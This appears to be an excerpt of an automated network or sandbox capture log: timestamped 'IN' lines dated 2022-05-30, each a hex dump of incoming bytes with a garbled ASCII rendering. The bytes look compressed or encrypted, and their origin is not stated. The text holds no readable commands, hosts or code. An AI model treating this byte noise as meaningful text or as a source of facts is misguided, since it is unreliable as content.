2022-05-30 12:45:59 UTC	827	IN	Data Raw: 38 76 ae 3b d5 77 ee 99 52 b2 e8 b4 86 56 17 79 61 92 4c 5c 6c 5a f9 37 ba 6a ae 08 c2 32 5d d4 58 a1 65 b9 ca 58 22 1d 68 d3 60 16 e1 23 2e c0 6e af 30 48 33 fb 14 d0 9e f2 13 d3 ae 3b 8d 4b 6d 97 ed e6 03 8a 7d 05 27 e1 9e 15 05 b2 34 d9 bb 81 ef b5 91 7f 88 ed fa 70 05 8d a9 06 12 b1 fa 3e d4 1c aa a2 14 f3 34 6a dd 58 a2 d2 ff 3a 80 75 e0 4d 34 7b 7b 83 ce ce 92 11 48 55 b3 84 43 5b 8f 93 38 09 16 6e 5b 54 b0 b2 03 23 2c 5f 1b 5d 08 93 ba c0 32 4f 6d 51 0f 31 d4 65 2e df f6 6f 07 4e 92 5e f8 34 06 77 fa cc b4 9e 5f 4f cb 6b 4d 66 73 41 f2 f8 a6 19 a6 77 ef d7 c7 26 88 89 b2 23 d6 8b b3 21 36 b6 29 27 a1 8a 85 89 8b 92 1f 13 3c cf bb ba d7 02 1d 5d b5 cd 7f 37 22 a1 97 ed ed ff 02 8c 78 6a 0a 3c 24 cd 8c 40 e8 3e 19 ea 88 1b 37 fd fd d9 86 d4 55 75 0b Data Ascii: 8v;wRVyaL\lZ7j2]XeX"h`#.n0H3;Km}'4p>4jX:uM4{{HUC[8n[T#,_]2OmQ1e.oN^4w_OkMfsAw&#!6)'<]7"xj<$@>7Uu
2022-05-30 12:45:59 UTC	827	IN	Data Raw: 42 e0 a9 23 ae b6 56 bb 33 e7 48 28 53 78 07 20 88 0d de 93 a5 f5 58 6f 36 81 73 3b 98 18 f3 7d d8 58 19 dd 4e ae 12 c9 99 5e d2 9d d0 f8 76 65 1c 12 e7 3e 32 0e 34 9e 10 b2 0a eb 40 ce 52 0f 80 1a e8 65 b9 c7 38 4e 72 1d b2 0c 36 98 45 5a a1 0e c3 55 6f 23 9b 78 bf f0 93 7f f3 c9 5d f9 2a 1d fb 88 c6 72 e5 13 76 51 93 eb 76 50 dd 46 f9 d5 ed 80 c6 d1 0d ed ca f8 50 6b e8 9f 5d 4f b1 f7 1e b0 79 85 c7 60 96 6d 37 dd 58 f2 b2 90 57 ff 1c c0 2e 07 17 17 f0 aa a9 b5 11 1b 35 c3 e8 2f 38 ea fe 0a 67 62 4e 29 31 dc d7 2e 46 0c 3c 7c 32 7b e6 a4 a5 15 4f 60 31 7f 5d d8 06 4b b2 b3 01 73 6e 86 3b 94 51 6e 12 a1 91 e6 fd 33 20 b1 1e 3f 03 52 41 f2 f8 b0 79 cb 16 01 b6 a0 43 e6 a9 c4 46 34 ff dc 53 1c d5 46 49 50 fe f7 fc e1 e6 70 61 9f a6 cf df b3 63 69 32 43 ea Data Ascii: B#V3H(Sx Xo6s;}XN^ve>24@Re8Nr6EZUo#x]*rvQvPFPk]Oy`m7XW.5/8gbN)1.F<\|2{O`1]Ksn;Qn3 ?RAyCF4SFIPpaci2C
2022-05-30 12:45:59 UTC	829	IN	Data Raw: f7 41 39 48 b3 24 36 da 0e ab 71 e7 cd 22 ae 30 2f e3 d6 9d 97 2f db a9 ab 36 a7 42 e7 8a c1 d0 08 f9 9a e7 2c bd b8 5b fd 70 88 10 06 b9 c8 4e 49 a5 48 ed e5 f7 0a 6a c8 01 bd 90 d0 41 65 ca 46 71 20 fa 78 bc c9 32 e9 a6 a2 c5 c7 b6 45 9d 36 e8 de 11 22 b4 43 95 d0 d5 d1 12 ea 03 61 5f 75 3c e9 8e 67 f6 73 b9 d6 ea 0b 9f 95 85 81 9a 75 46 3a c3 42 88 44 d5 ae 3d a1 c3 f5 ef 6f ef fb e1 d6 94 74 65 1a cd 26 01 60 ac 37 13 8a 32 97 69 2e 60 1d cc 5a 1b 6e db 1e 00 29 51 38 1d b2 6e 80 a7 17 3e 27 d6 1c 3f 72 8f ce 1d 84 96 6d 96 3d 3e 3b 22 b2 03 d3 dd ef 9e fe fe 99 14 50 cb 77 7a 11 59 cd 46 0c 49 5d 5d f1 22 b8 69 54 16 dc b7 0c e1 42 f4 1a 3d d9 c8 9b 20 11 7e 31 8a 2b 11 83 a3 74 3e 87 13 42 d8 a9 03 ae 93 56 9b 33 ca 48 08 53 5e 07 00 88 24 de b3 a5 Data Ascii: A9H$6q"0//6B,[pNIHjAeFq x2E6"Ca_u<gsuF:BD=ote&`72i.`Zn)Q8n>'?rm=>;"PwzYFI]]"iTB= ~1+t>BV3HS^$
2022-05-30 12:45:59 UTC	830	IN	Data Raw: d1 81 a2 54 02 d0 2c 0f 31 72 06 85 46 0a 63 8d 0a ff 77 33 5d 12 28 7e 1a 17 fd 4e 25 07 d3 6b 08 08 63 ef 4b 64 80 af 46 e7 23 46 fa bd 23 71 93 62 97 c5 2d ec f3 45 01 86 6e 83 2b 49 19 15 94 80 ef f8 75 84 14 1d 1c 10 89 68 5f 59 bc 54 78 bd 91 20 48 d9 ca 2d 47 df 14 ae 52 c8 6c a6 43 2e d1 0c b3 de 0f 4e 01 92 07 1c 98 b8 b8 14 58 ef 07 35 71 ad 23 eb fe 83 5c 59 ce 2f 59 c0 9f b4 92 55 27 27 d2 5b b0 03 91 9b 70 cd 14 29 fc 24 08 14 5b e3 9e 24 8c ec 0e f9 ce e6 e9 ad 35 87 c4 d8 10 83 cd 61 8a bd 27 ec f7 77 39 d0 a9 bb a0 40 91 cb 3c 7b bb c7 14 5b fc 5c 9d 40 27 38 2b 95 d1 b3 9c ce 25 00 fa 8d 06 33 6a 1e eb 9b b8 4b 05 a8 33 97 94 96 af e9 b8 fc ce fe ec 71 e2 bb f6 5e ef 2e 6e a8 52 c7 9e c0 1a ae 9d 56 a3 25 de 77 7c b0 1d a4 9a 75 61 05 2e Data Ascii: T,1rFcw3](~N%kcKdF#F#qb-En+Iuh_YTx H-GRlC.NX5q#\Y/YU''[p)$[$5a'w9@<{[\@'8+%3jK3q^.nRV%w\|ua.
2022-05-30 12:45:59 UTC	831	IN	Data Raw: 26 7a 97 15 b6 3a 03 a3 e2 2a ce e5 a0 89 fc 37 98 50 96 b5 61 1f 8c 45 c3 74 9c 34 84 2b 61 02 98 5b 36 ff 6a 03 f7 1c eb 76 90 6f ff c5 ad 65 02 55 f2 32 20 a1 c0 e4 e2 36 59 c3 47 f7 bf 53 d8 75 60 1c 9d 07 fc 13 02 4b 4e da a0 70 aa a8 59 c0 14 96 a1 33 6d ab ed e0 19 5d 1a 4a 07 4e 97 73 2c 29 63 4e 3f 55 27 31 f4 1c fe 33 da 65 ef f7 7d 25 15 29 d8 18 5f 92 67 c3 9c cf fe 3e d6 72 bb 8c 59 8f 02 8f 7b ac d5 eb 84 6e 72 ce 4e 9b 47 a5 25 68 9c 39 84 f4 be 1d 59 2c 9b e4 e2 a0 1a f5 df 53 16 d5 56 78 87 55 fe 2e b0 ea d6 aa 3a c7 99 58 26 7f 03 f3 33 6d 0a 41 ca 85 d6 43 c4 3e 24 77 19 42 b5 67 41 03 43 da 00 95 9b cc 3c 93 a3 2c cd b7 1b 44 42 21 4a 3c 8a b6 29 c6 ec d3 20 2e 21 33 d8 f5 08 06 65 a5 e0 b4 23 fe b3 54 8c 2e ec cd 8b b5 f2 65 5f ab 81 Data Ascii: &z:*7PaEt4+a[6jvoeU2 6YGSu`KNpY3m]JNs,)cN?U'13e}%)_g>rY{nrNG%h9Y,SVxU.:X&3mAC>$wBgAC<,DB!J<) .!3e#T.e_
2022-05-30 12:45:59 UTC	833	IN	Data Raw: a8 b6 e4 cb 9c 17 ff e4 1b 4a 82 56 aa 9b 2a fd b6 3b 1f 47 41 fb 98 d6 24 21 69 d1 99 a8 f6 e1 92 ac f5 ae 7d 59 ba ec af 14 d2 43 15 dc 1f 14 f6 01 97 41 5f bb d9 1f 3c e7 12 91 eb f5 99 b4 f2 88 52 ce aa 51 50 80 14 54 05 8a 22 97 18 9e 17 07 d6 5b d9 ae b8 1a 52 13 a0 2b 44 8c c2 1e 86 f4 a1 94 b5 ff e1 10 a7 73 1b a3 00 f7 41 4c 5d ac 05 50 c3 6b aa e5 88 de d0 85 09 31 a3 65 c0 b2 60 1e cd 7e 36 ad 3f 2f e5 72 bf 7f d9 b5 a1 3b 46 fa f0 f7 1b 4a 8e 70 6e 58 47 5e 79 a6 a2 f6 01 00 40 b1 a9 2c 3d 98 94 3e 85 93 f9 1b 22 c6 51 fd 5a d9 2e 88 04 de 93 c1 b3 99 f5 be 58 ea 17 db c9 e9 9a 58 f6 37 e0 b8 cc 2f b0 d0 d0 91 34 37 8b 3c 83 e1 37 7d 4e e4 e5 db 51 da bf dd 4f cd 7f 3e 0f e4 ef 5b b9 f7 6f 56 46 da aa 2c 49 b9 e3 8d 0e 2f f0 94 93 1b ff 4f bb Data Ascii: JV*;GA$!i}YCA_<RQPT"[R+DsAL]Pk1e`~6?/r;FJpnXG^y@,=>"QZ.XX7/47<7}NQO>[oVF,I/O
2022-05-30 12:45:59 UTC	834	IN	Data Raw: 06 8a 84 15 1f 5e 14 f9 6e 3f 51 c0 5e 00 b1 e8 2e 47 c9 db 3f 07 cb 64 b8 35 d0 01 bc 3d 32 a1 12 ce fe 4b 6c 50 b6 22 3a f0 90 f2 3e 07 c3 45 1b 3c 9d 77 d9 bf b7 69 6f b7 17 0f fa d2 88 ca 6b 75 67 d1 39 b6 67 86 fd 17 a5 7d 43 d3 48 00 7a 57 93 8a 56 92 98 19 8f dc 9e e2 d7 6e db 99 86 0e e3 e1 03 e9 d9 42 8a c0 1f 1d ba c2 d7 cd 2e b3 bb 00 09 e7 b3 05 2d ef 24 cb 3a 25 44 2f eb ae 33 1d 4c c2 84 1b 0b e5 bb 87 94 4c 17 15 c5 c7 38 ef 05 4a 02 77 7f 0f 64 33 64 13 ed 53 25 49 fe 37 8c b4 0c 8e 61 40 68 b3 04 7e fa 46 8b 4b c7 a0 02 c3 10 15 c3 a5 bd e4 0f db e1 ab 26 a7 52 e7 9a 85 57 4d e9 d2 60 69 ad f4 dc b8 60 d8 97 43 a9 9c c9 0c b5 10 6a a0 e7 56 79 8d 85 dd 83 95 c5 0d d9 03 f5 50 e9 3d 38 b1 21 ac 22 26 42 82 a6 d5 1a 73 f8 46 96 67 a4 e7 12 Data Ascii: ^n?Q^.G?d5=2KlP":>E<wiokug9g}CHzWVnB.-$:%D/3LL8Jwd3dS%I7a@h~FK&RWM`i`CjVyP=8!"&BsFg
2022-05-30 12:45:59 UTC	835	IN	Data Raw: c7 52 96 42 37 ec 58 8f b2 a0 57 ee 1c a1 2e 25 17 7e f0 8a a9 d8 11 3b 35 ee e8 55 38 83 fe 33 67 4f 4e 4d 31 a8 d7 14 46 63 3c 05 32 1e e6 e5 a5 7b 4f 19 31 0a 5d c6 06 2e b2 e1 01 5e 6e 81 3b fd 51 1c 12 c5 91 fb fd 44 20 95 1e 53 03 65 41 df f8 97 79 e6 16 b1 b6 a0 43 ec a9 a5 46 c5 ff b5 53 3b d5 2b 49 a1 fe da fc 9f e6 19 61 72 a6 e2 df d6 63 0c 32 a4 ea 0a 37 50 c1 93 8c f7 9e 1c e9 31 4a 0f 59 3e b9 90 32 bc 5a 19 99 91 69 24 9e fc b6 9a f4 5f 01 1a 4f c6 c4 97 47 7b 6b b7 80 09 26 b3 b5 5b 3d 32 ea 8c 10 c0 cd c2 b6 c3 43 81 c2 cf 47 b9 33 ce fd bf c2 94 ac ba c3 05 98 85 df 63 b1 bd d4 93 31 ff 84 04 4d d7 03 a8 a0 78 55 a6 9b 4b 8e 48 2b ef 1c 72 b7 93 72 f8 75 b7 b1 81 ef 08 7c 77 06 a7 84 76 1f 6a 14 fe 6e 2a 51 d0 5e 1d b1 e8 2e 6a c9 b7 3f Data Ascii: RB7XW.%~;5U83gONM1Fc<2{O1].^n;QD SeAyCFS;+Iarc27P1JY>2Zi$_OG{k&[=2CG3c1MxUKH+rru\|wvjn*Q^.j?
2022-05-30 12:45:59 UTC	836	IN	Data Raw: 1b 3c 18 00 61 ad 36 03 8a 2a d7 71 2a 78 15 d4 5e 03 66 59 1b 8e 20 d3 3d 93 bb ec 81 25 16 3c 26 d4 1d cd 4c f2 cd 2a 47 fc 4d 36 e6 33 f3 1e f3 fe 2d 20 11 63 00 13 e7 16 51 c9 76 78 10 4b cc 44 0d 4b 5c 5f f0 aa 78 79 54 06 dc a7 0c 59 02 d4 1a 1d d9 e8 9b f0 6e 5e 31 a2 2b 31 83 83 74 1e 87 33 42 f8 a9 23 ae b3 56 bb 33 ea 48 28 53 7e 07 18 cb 04 de 93 a5 f2 58 57 75 72 8c c4 67 ef 0c 72 d8 ab e6 22 b1 58 ed c6 99 52 d2 9d d0 f2 76 95 23 15 e7 3e 32 05 34 6e 2f 45 f5 14 bf 3d ad f0 ff f3 17 9a 46 35 c7 b1 0d 3a d5 86 d1 e8 9d 0f 9e b3 63 51 b8 3b f0 d4 80 8a dd c5 9c 73 ef 7a 15 81 3e 0a 39 dd 5a dd 49 bc aa 11 88 33 f3 a0 c6 d8 ed 80 3e 1b f2 12 35 fa 50 6b a8 99 48 b8 0e fb 1e b0 79 c6 c7 90 e9 6f 37 dd 58 a2 b2 60 28 ee 1c c0 2e 55 17 e7 0f a7 a9 Data Ascii: <a6qx^fY =%<&L*GM63- cQvxKDK\_xyTYn^1+1t3B#V3H(S~XWurgr"XRv#>24n/E=F5:cQ;sz>9ZI3>5PkHyo7X`(.U
2022-05-30 12:45:59 UTC	838	IN	Data Raw: b3 4c d3 1f f4 98 17 c8 7d 21 97 27 65 0f 34 e1 ef 31 ff 98 7b e8 b9 fb 90 a5 6e b6 99 e7 4f 8d ac 2e e9 aa 42 fd 90 76 50 c9 c2 a4 cd 2e fe bb 4d 60 c8 c1 61 44 8b 57 e4 52 5c 69 56 8e ae 5d 1d 2b a6 e8 7f 62 81 c8 e3 fc 60 17 35 ac 8a 4c a2 64 07 6e 3a 16 2f 05 57 0a 77 c0 7f 56 69 89 4e e5 cd 7f f7 12 39 68 b3 6a 36 95 0e f9 71 b0 cd 67 ae 77 2f aa d6 dc 97 61 db e1 ab 48 a7 3d e7 e8 c1 b7 08 8c 9a 90 2c c4 b8 2a fd 0e 88 2d 06 cb c8 31 49 de 48 90 e5 86 0a 82 c8 85 bd 14 d0 ab 65 21 46 87 20 09 78 5d c9 d1 e9 4b a2 b4 c7 c8 45 a0 36 96 de 78 22 ca 43 ea d0 26 d0 e0 eb e9 60 de 74 cd e8 60 66 85 72 cc d7 9e 0a f9 94 f1 80 fe 74 34 3b a7 43 a4 45 b6 af 4e a0 a3 f4 94 6e 87 fa 8c d7 fc 75 05 1b a2 27 00 61 ad 36 70 8a 52 97 18 2e 1e 1d b5 5a 78 6e 31 1f Data Ascii: L}!'e41{nO.BvP.M`aDWR\iV]+b`5Ldn:/WwViN9hj6qgw/aH=,*-1IHe!F x]KE6x"C&`t`frt4;CENnu'a6pR.Zxn1
2022-05-30 12:45:59 UTC	839	IN	Data Raw: 72 61 a1 fe 94 88 33 54 b8 76 3f 2e 54 2a f2 97 a6 0b cb 73 81 d7 a0 43 ec dd c4 34 b5 96 dc 3d 16 bc 46 2d d2 9f f7 98 e8 c6 70 47 1c 86 cf ab a5 0c 69 50 c7 8b 7f 50 22 ae fa 8c 83 eb 65 87 1c 23 7c 2d 47 dc e3 56 c8 77 7c f2 fc 00 42 f0 89 d1 f4 90 3c 6e 6e 22 af c4 f8 47 15 1e c4 ee 24 4f df c1 6a 58 1f 8e bd 3d ed be f2 c2 c3 22 81 b6 aa 22 c1 40 ba fd 92 c2 f9 ac c9 8b 8d dd f2 9a 0a ff d3 81 be 31 94 d8 c4 08 a5 46 c6 ee 1d 00 ca 9b 78 0e df 6e c2 59 02 f9 f2 27 9b 75 dc 15 45 aa 6f 39 12 48 8a c5 15 1f 1f a8 29 2b 58 1f b5 12 73 f3 9c 2e 47 05 7e 7a 54 8e 01 f6 45 93 75 bc 58 d2 69 57 ac a4 2e 24 22 fe 22 3a bf 78 34 7b 73 99 2a 53 5e d4 12 d9 cd 47 cc 2a f9 54 60 b2 a4 db af 6b 18 67 15 7c d3 3d f4 b5 17 ed 7d 43 97 6c c3 3f 34 d0 ef 1e ff cb 7b Data Ascii: ra3Tv?.TsC4=F-pGiPP"e#\|-GVw\|B<nn"G$OjX=""@1FxnY'uEo9H)+Xs.G~zTEuXiW.$"":x4{sS^G*T`kg\|=}Cl?4{
2022-05-30 12:45:59 UTC	840	IN	Data Raw: 38 5c 5f f0 32 d5 16 30 60 dc a7 0c c1 2e b0 7f 65 a9 e8 9b 00 4e 3d 50 c0 58 31 83 83 2b 76 fe 43 2d 8c a9 23 c8 de 39 df 33 ea 48 28 35 0c 62 58 f8 04 de 93 fa 8b 68 6f 69 f4 42 3b c7 69 9d 7d 87 38 76 ba 2c a7 12 c9 c6 3c b7 e5 a4 93 10 11 79 67 e7 3e 26 05 34 9e 98 0e 4f eb 5d c2 52 0f 0c b8 ad 65 a3 ca 38 4e e2 bf f7 0c 2d 97 45 5a 35 b8 86 55 70 33 9b 78 23 49 d6 7f e0 d8 5d f9 8e bb be 88 e7 60 e5 13 8a e1 d6 eb 78 71 dd 46 fd 6b a8 80 cb e4 0d ed c6 49 15 6b e7 de 5d 4f a5 49 5b b0 69 c6 c7 60 8a dc 72 dd 5d a2 b2 90 73 5d 59 c0 30 55 17 17 dc 14 ec b5 03 48 35 c3 d8 91 7d ea de 5d 67 62 7a 8c 74 dc db 77 46 0c 04 c4 77 7b ed c8 a5 15 0f de 74 7f 48 b5 06 4b fa 20 44 73 72 f6 3b 94 01 c1 57 a1 88 94 fd 33 78 0b 5b 3f 12 54 41 f2 98 15 3c cb 0e 81 Data Ascii: 8\_20`.eN=PX1+vC-#93H(5bXhoiB;i}8v,<yg>&4O]Re8N-EZ5Up3x#I]`xqFkIk]OI[i`r]s]Y0UH5}]gbztwFw{tHK Dsr;W3x[?TA<
2022-05-30 12:45:59 UTC	841	IN	Data Raw: 84 e7 62 c4 bb d5 90 60 17 91 ac cf 38 95 01 07 02 8a 16 6a 64 6f 60 77 ed c3 4c 2c fe 77 88 cd 0c 3f 08 7c 68 89 00 36 fa da e2 34 c7 f6 06 ae 10 cf aa 93 bd a9 0b db e1 47 4f e2 52 d8 9e c1 c0 f0 80 df f7 6c a9 b8 4b f9 0a cd 00 47 ad c8 5e 59 df 0d fd a6 e3 0a ee d4 ef f8 14 94 c1 65 4e 72 9f 65 7e 3d 3c c9 b6 a9 48 e7 d5 81 a2 45 8d 7a 92 9b 01 65 a0 43 85 88 3e 95 93 a2 86 60 de 10 d7 ad 0f 2c f3 72 b8 a7 81 4f 9e df 80 80 9b 08 2d 7e c2 0f 8d 45 d4 27 56 e5 c2 ba ea 6e ee 6e 8a 92 95 3a 60 1b cc 87 6a 24 ad 66 07 8a 22 3b 13 6b 70 4f d8 5a 0b d6 33 5a 82 7e d7 39 9f 77 86 c4 25 41 38 26 d4 cd 57 36 8d 95 1b 85 94 8c fe 79 3c 5f 24 b3 01 22 b5 ab 9c 94 f8 98 16 51 a2 33 78 7c 5f cc 44 1d 20 19 5f 71 36 b8 79 48 6d 99 a7 0d c9 42 d4 32 76 9c e8 9f 08 Data Ascii: b`8jdo`wL,w?\|h64GORlKG^YeNre~=<HEzeC>`,rO-~E'Vnn:`j$f";kpOZ3Z~9w%A8&W6y<_$"Q3x\|_D _q6yHmB2v
2022-05-30 12:45:59 UTC	843	IN	Data Raw: 59 e4 b9 e3 32 ac 2b 39 99 31 69 42 9e f9 c7 b1 f4 90 01 6e 4f d3 b5 bd 47 dc 6b c4 80 ac 57 9a b5 f8 3d 1f ea 29 61 a8 cd 48 b6 c3 43 21 b3 ef 47 04 33 ba fd 3e b3 bc ac 7d c3 28 98 4a ae 4f b1 05 d4 be 31 50 f5 24 4d 75 03 c6 a0 cd 24 8f 9b 33 8e 7a 2b 1e 6d 47 b7 32 72 9b 75 34 c0 a5 ef bc 7c 12 06 22 e1 50 1f 16 14 8c 6e ac 20 f0 5e a2 b1 9c 2e 47 bb 9e 3f 89 cb 01 b8 49 a2 30 bc 8f 32 cc 12 b4 8c 6b 6c e8 b6 22 3a 9b e2 d4 3e c6 c3 2a 1b 6e ef 57 d9 0c b7 69 6f c5 65 25 fa 70 88 af 6b 50 15 f6 39 77 67 f4 fd 43 d7 38 43 3a 48 65 7a 54 e1 aa 56 20 98 7b 8f d5 ec d5 d7 fd db 99 86 37 91 e9 03 09 d9 42 8a 14 6d 15 ba 79 d7 cd 2e 6e c9 08 09 06 b3 61 2d 17 56 a1 3a bd 44 56 eb 06 41 58 4c 7d 84 7f 0b 35 c9 a6 94 be 17 35 c5 4a 4a e7 05 de 02 3a 7f e3 16 Data Ascii: Y2+91iBnOGkW=)aHC!G3>}(JO1P$Mu$3z+mG2ru4\|"Pn ^.G?I02kl":>*nWioe%pkP9wgC8C:HezTV {7Bmy.na-V:DVAXL}55JJ:
2022-05-30 12:45:59 UTC	843	IN	Data Raw: 46 24 d2 fe f7 88 9c a3 70 e2 1c a6 cf 97 c2 26 69 0f c7 ea 7f b7 56 84 fa 0a 83 9e 65 d1 7b 0f 7c 62 47 b9 e3 be bc 1f 7c 1d fc 69 42 7e ef f3 f4 c4 3c 01 6e d7 db 81 f8 da 15 6b c4 24 50 63 df c2 6a 3d 1f 5a c9 55 ed b8 f2 b6 c3 ff f5 87 aa 12 c1 33 ba 0d f7 87 f9 be c9 c3 28 50 86 9a 0a 27 d3 d4 be e5 e0 c1 61 19 a5 03 c6 40 69 10 ca 0c 78 8e 7a d3 a7 59 02 a4 f2 72 9b 99 a8 f4 e0 62 6f 7c 12 16 ed c1 15 29 1f 14 8c 96 2c 14 b5 20 73 b1 9c 2e 21 8c db 2b 54 cb 01 bc 30 95 75 ea 58 32 cc 1a ca bb 2e 79 22 b6 22 2a ca d5 91 69 73 c3 2a 07 2b d8 12 41 cd b7 69 47 8c 52 60 76 a4 88 af 53 6d 22 b3 a6 d3 67 f4 b5 62 e0 7d eb 97 48 65 6a 52 d6 ef 40 ff 98 7b d7 cc db 90 8f 6e db 99 9e 29 a6 ac 14 e9 d9 42 ee e5 5a 50 e3 c2 d7 cd 6e 99 fe 4d 35 c8 b3 61 5d fe Data Ascii: F$p&iVe{\|bG\|iB~<nk$Pcj=ZU3(P'a@ixzYrbo\|), s.!+T0uX2.y""is+AiGR`vSm"gb}HejR@{n)BZPnM5a]
2022-05-30 12:45:59 UTC	845	IN	Data Raw: f8 a9 93 4a 8c 56 bb 33 ea 48 98 b7 41 07 20 88 04 de e9 41 cd 58 6f 36 8d 73 41 7c 2f f3 7d d8 54 19 9b aa 98 12 c9 99 52 d2 db 34 cd 76 65 1c 15 e7 2a d6 3a 34 9e 10 ba 0a ff a4 fd 52 0f 80 0c e8 87 5a f5 38 4e 72 0b b2 ee d5 a8 45 5a a1 0c c3 e7 8c 0c 9b 78 bf fd 93 cd 10 e7 5d f9 2a 0f fb 0a 25 5f e5 13 76 53 93 69 95 4e dd 46 f9 d8 ed d2 25 db 0d ed ca fa 50 39 0b e1 5d 4f b1 fa 1e 94 9a f9 c7 60 96 6f 37 f9 bb 9d b2 90 57 ee 1c 36 cc 6a 17 17 f0 a7 a9 43 f3 77 35 c3 e8 22 38 20 1c 62 67 62 4e 3f 31 16 35 48 46 0c 3c 77 32 e5 04 f7 a5 15 4f 6d 31 e1 bf 8a 06 4b b2 93 01 07 8c c9 3b 94 51 72 12 d5 73 ab fd 33 20 b8 1e 75 e1 6b 41 f2 f8 a6 79 81 f4 be b6 a0 43 ec a9 e4 a4 8a ff dc 53 16 d5 66 ab ed fe f7 fc e8 e6 88 80 23 a6 cf df a5 63 91 d3 f8 ea 7f Data Ascii: JV3HA AXo6sA\|/}TR4ve:4RZ8NrEZx]%_vSiNF%P9]O`o7W6jCw5"8 bgbN?15HF<w2Om1K;Qrs3 ukAyCSf#c
2022-05-30 12:45:59 UTC	846	IN	Data Raw: 00 01 e2 4e 38 36 f6 41 bf 26 c0 2e 3d 9a e0 4d 95 3e 26 a7 32 db 61 3e 8e 27 1e 04 a5 7c f4 a4 15 09 b7 31 90 b8 87 18 bd c8 92 e5 96 7b 06 fe 5f 93 6e d1 da 0a ba d2 ee 27 cc 33 fa 5b 50 ee aa ed b9 50 05 c9 b6 6f d6 6d ce 23 99 c1 a7 38 41 08 6e 25 99 43 59 90 9b 8b f0 0f bd cd 14 66 69 3d e7 4a ca 72 9c e3 89 e2 3d 70 bb e4 1f 83 d4 92 8d 61 b4 45 b8 d7 29 70 2a 10 d1 4d d8 ca 30 17 24 4d 59 1b 08 bc 26 0c 87 d3 3c 43 ab 61 11 0c 72 2d e1 5a f3 72 8e 8e ee cd ec a7 f1 85 3d 2e 5e f6 00 26 d0 24 66 23 26 2a 20 7f f7 09 62 46 5e ef 1c b3 19 f6 75 6c 72 1a c3 26 50 8b c5 4e 7a 32 66 cc 7c f7 b5 1e 71 16 0d 88 1e 93 95 8b 54 22 fc 42 d4 1a 1d d9 e8 6b 3f 11 5e 31 a2 ab f1 6c bc 74 1e 87 33 42 7a 46 1c ae b3 56 bb b3 ae a7 17 53 7e 07 20 48 03 31 ac a5 f2 Data Ascii: N86A&.=M>&2a>'\|1{_n'3[PPom#8An%CYfi=Jr=paE)pM0$MY&<Car-Zr=.^&$f#& bF^ulr&PNz2f\|qT"Bk?^1lt3BzFVS~ H1
2022-05-30 12:45:59 UTC	847	IN	Data Raw: aa 7d f0 1c 2f 3b fb 26 61 9f d1 cc ff aa 47 de 93 bb 46 34 fd 89 77 f0 b7 76 01 ce e2 0a 31 8f b7 0d 7f 38 bb 68 9b 6f be 54 21 57 68 ca 1b 4b 0e f1 c1 72 23 e7 ac dd e6 0c 62 92 8c e0 ef c6 1e e2 af 39 bb 51 45 0a 3a 63 7f 68 6c b5 5e 8b fe f4 4b f1 f6 74 00 fd 46 f3 3c 75 ed 75 bc 05 01 70 0b 15 c1 51 92 21 5b a0 5a 9b ad 91 7e b3 14 93 dd e5 a2 4a ff a8 f5 81 d8 bc 2a 60 7a 78 69 dd 19 a6 58 ef 9b e0 44 5d d3 5d 98 7d 83 99 ca b2 f6 f4 ac e9 54 4b 89 be cc 8c a3 90 17 5d e1 16 5a 8e dc e0 77 84 72 ce d3 d5 22 50 fa 6d f0 b7 05 3d 84 fc 2b ad 4e c0 86 8c 19 e4 3a 28 08 00 9d 6a 0c 6d c3 3d a0 e0 c8 cc 86 e3 f4 f0 73 7d 05 4f 07 ca 33 58 7c ee ba 07 59 57 04 0f 02 db 22 ae c1 b6 6a d0 55 1d e7 76 55 b3 84 f5 00 57 c7 b9 f8 ba 48 1f 41 fc 9f 95 80 97 cf Data Ascii: }/;&aGF4wv18hoT!WhKr#b9QE:chl^KtF<uupQ![Z~J*`zxiXD]]}TK]Zwr"Pm=+N:(jm=s}O3X\|YW"jUvUWHA
2022-05-30 12:45:59 UTC	849	IN	Data Raw: 8d 0c 69 6f cf 0b 62 33 0c 9e be 8a 1e a9 80 5c 6f 9f 37 53 02 fd e3 a5 7f 80 d1 29 95 ae 24 f0 89 4c 22 50 cb 53 93 1f fa 53 c0 96 46 99 08 93 0e 96 64 d1 77 fa f0 1a 96 74 02 80 0e 3b 4c 75 59 b0 d2 5d 2b 6f f7 e0 51 dc 34 5e e8 2e e0 3f dd f3 78 21 4d a7 e9 d8 ef 18 99 0e 57 2b 18 65 45 d9 03 49 f3 3f b1 e2 3f ef 95 c0 83 4e fa e9 02 05 50 10 f2 6d d1 24 40 e9 fa 80 0d ab b4 31 60 66 bf b3 ec 72 f2 22 6a 34 db f8 9f 0f 77 20 ea cd 1a b8 45 a6 d9 70 4c 6c f9 6a fc f3 6f a6 c6 db 68 99 ee 16 55 02 ab 97 83 3e 43 ea 2b 25 06 7f ba 8f 62 a5 c3 21 3b 6a 43 b7 88 77 9b 08 e8 39 17 29 54 1c 4a 5e fd 67 6c 24 8d f5 ff 74 49 b8 03 63 23 89 b6 8b 35 8a 05 a9 f0 41 12 ae 2a 95 51 85 3d 24 66 69 29 0a 0e d9 55 a1 d1 93 da d7 47 f0 fe 81 c2 c1 b8 6c 50 7f 42 51 e0 Data Ascii: iob3\o7S)$L"PSSFdwt;LuY]+oQ4^.?x!MW+eEI??NPm$@1`fr"j4w EpLljohU>C+%b!;jCw9)TJ^gl$tIc#5A*Q=$fi)UGlPBQ
2022-05-30 12:45:59 UTC	850	IN	Data Raw: 78 b8 c4 46 d6 22 a2 d5 c7 e6 48 7d 09 f8 de 01 22 a4 4e 75 ef 54 d0 93 eb 42 6c 2e 4b bd e8 0f 66 77 7e 48 e8 eb 0a 9e 94 c4 8c 6b 4b 47 3b c2 43 89 49 24 90 3c a0 c2 f4 2e 65 1e c5 e0 d7 95 75 e4 10 3c 18 00 61 ad 36 43 81 d2 a8 79 2e 70 1d dc 51 fb 51 59 1f 82 28 13 33 6f 8c ec 81 25 16 bc 2c 24 22 3d 73 8d cf 5f 8f 64 53 94 3c 3c 3a 20 b9 f1 ed df ee 9c ff 3c 91 e6 6e c9 76 78 10 db c5 b4 32 4b 5c 5f f0 72 b1 89 6b 06 dc a7 0c c1 4b 24 25 1d d9 e8 9b c0 19 ae 0e a2 2b 31 83 03 7c ee b8 33 42 f8 a9 63 a6 43 69 bb 33 ea 48 28 5b 8e 38 20 88 04 de 53 a2 02 67 6f 36 8d 73 bb 9f e0 cc 7d d8 54 19 9d 49 57 2d c9 99 52 d2 9d d7 02 49 65 1c 15 e7 fe 34 f5 0b 9e 10 ba 0a 6b 46 32 6d 0f 80 0c e8 25 bf 3a 07 4e 72 0b b2 0c 30 67 7a 5a a1 0c c3 95 6a c3 a4 78 bf Data Ascii: 